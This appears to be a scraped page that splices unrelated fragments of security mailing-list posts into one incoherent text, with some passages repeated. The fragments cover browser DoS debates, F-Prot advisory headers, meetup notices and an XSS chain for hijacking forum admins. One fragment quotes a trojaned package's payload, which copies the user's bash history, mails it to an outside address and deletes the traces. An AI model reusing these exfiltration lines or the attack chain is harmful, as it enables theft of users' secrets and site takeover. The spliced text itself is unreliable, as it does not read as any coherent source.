| New User, Welcome! Login |
last time
"defenses". - Browser detects loop or script that doesn't exit, asks user if he
wants to stop it. Been there, done that.
SMC> If you try to load the full XML downloads from cve.mitre.org into your
SMC> browser, good luck with that - you get CPU and memory consumption very
SMC> quickly (last time I checked).
Apples and Oranges, nobody said CPU consumption is a vulnerability per
se. The possible impact is what makes it a vulnerability or not, such as
browser crashes, OS reboots, etc pp.
I still have trouble to understand why some are not using the impact
$cacheFile = fopen($this->cacheDir.$this->cacheFile, "w");
fwrite($cacheFile, $data);
fclose($cacheFile);
}
// fsockopen failed the last time, so force cache
elseif ( $forcecache == true )
{
if (file_exists($this->cacheDir.$this->cacheFile)) {
$data = implode('', file($this->cacheDir.$this->cacheFile));
// set the modified time to a future time, and let the server have time to come up again
in version 4.5.0. Vendor didn't reply if said version is
now in ciculation.
CVE : none provided
Credit : Given in the History file
OSVDB vendor entry: none [1]
Security notification reaction rating : better than last time
Notification to patch window : n+1 (no patch for current build)
Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
cat $HOME/.bash_history >> /tmp/.bx 2>/dev/null
mail defcola@gmail.com < /tmp/.bx
sleep 4
rm -rf /tmp/.bx
What's up with this? Last time I downloaded this that wasn't there,
and it's the same version number but different md5.
.. and this file wasn't included.
----
Chris
What is even better is that the exploit will work outright if the
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).
If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:
as usual, we have our own room with it's own bar (1st floor, with it's
own entrance from the street or from the back of the downstairs bar).
as well as real ales and wife beater, good food is also available but
last food orders are strictly at 21:00, so make sure you get yours in in
plenty of time and don't go hungry like i did last time!!! :P
meet starts at 19:00, talks at 19:30
this month we have:
Hi, like last time, we are looking for community input and questions for the
Internet security operations community, to be discussed during ISOI 3.
ISOI is happening this Monday and Tuesday, we will likely compile the responses
in a few weeks.
We will reply to people personally on issues which bother them, and compile a
short text with answers to the community itself.
We tried to do this last time around, and encountered a problem with
What is even better is that the exploit will work outright if the
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).
If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:
it's always been possible to steal local files if you can convince a
user to open a "harmless" html file from their local filesystem. this
is possible because the scripting code runs within local context (in
FF terminology - not sure what Safari calls it).
last time i checked [1] [2] FF didn't even issue a warning when
opening a local file with scripting code in it, although i haven't
checked in the case of Safari
[1] http://www.gnucitizen.org/blog/web-pages-from-hell-2/
[2] http://marc.info/?l=bugtraq&m=116386919506057&w=2
The signal-to-noise logic probably does work, but I am not sure the legal
angle does. If you were *deliberately* ran the software that acidently
downloaded that kiddie porn the suggested angle might not work.
A law requiring log data to be retained for 6 momths should be a major problem
to enforce. Last time I think the UK mooted this it did not happen
(disclaimer: this might have been a trial balloon designed to generate flak).
My reaction at the ISP end was "OK, will you buy us the extra hardware
required?" with the intention the answer would be "no" and the plan quietly
killed. (Thinking that plain daft things will not be enacted is not always
reliable, unfortunately).
Status : Current version not patched, next engine version patched
Date unknown, vendor doesn't answer any longer.
CVE : none provided
Credit : none prodided
OSVDB vendor entry: none [1]
Security notification reaction rating : better thn last time
Notification to patch window : n+1 (no patch for current build)
Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
during analysis.
>
> A law requiring log data to be retained for 6 momths should be a
> major problem
> to enforce. Last time I think the UK mooted this it did not happen
> (disclaimer: this might have been a trial balloon designed to
> generate flak).
> My reaction at the ISP end was "OK, will you buy us the extra hardware
> required?" with the intention the answer would be "no" and the plan
> quietly
Vendor : http://www.f-prot.com
Status : Current version not patched, next engine version will be patched
CVE : none provided
Credit : Given in the History file
OSVDB vendor entry: none [1]
Security notification reaction rating : better than last time
Notification to patch window : n+1 (no patch for current build)
Disclosure Policy :
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html
But if you think of the infinite number of algorithms you could write in
Javascript, then it becomes a recipe for the death of a thousand cuts.
If you try to load the full XML downloads from cve.mitre.org into your
browser, good luck with that - you get CPU and memory consumption very
quickly (last time I checked). But is that a vulnerability per se? It
almost becomes a "laws-of-physics" vulnerability - if you send too much
data to an underpowered system with a small pipe, then a DoS is going to
occur because you can't violate the laws of physics. If you enforce some
resource restrictions, then you wind up with an incomplete rendering of
data (incorrect behavior) at least.
NOTE: Resending this was blocked last time.
Profit-driven malware has gotten very good at using Social Engineering
(backed up with Exploits) to spread itself. Zlob and it Codecs are one
particular example that has worked very well on Windows, even by
simply getting the user to install the software willingly. The
Storm/Zhelatin/Russian Business Network group however are by far the
best at this. They have shown time and time the power of simple Social
Engineering in order to infect victims machines. Zlob may have been
the first for profit malware to make the jump, but if it proves
|
|
|
